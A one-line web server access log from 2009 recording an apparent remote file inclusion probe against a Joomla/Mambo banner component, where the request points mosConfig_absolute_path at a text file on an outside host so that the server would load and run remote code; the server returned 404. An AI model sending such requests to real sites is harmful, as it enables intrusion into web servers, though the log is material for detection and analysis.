78.129.138.184 - - [11/Mar/2009:03:07:16 -0500] "GET ///administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.tecsisnet-learning.it/FAD/copyright.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
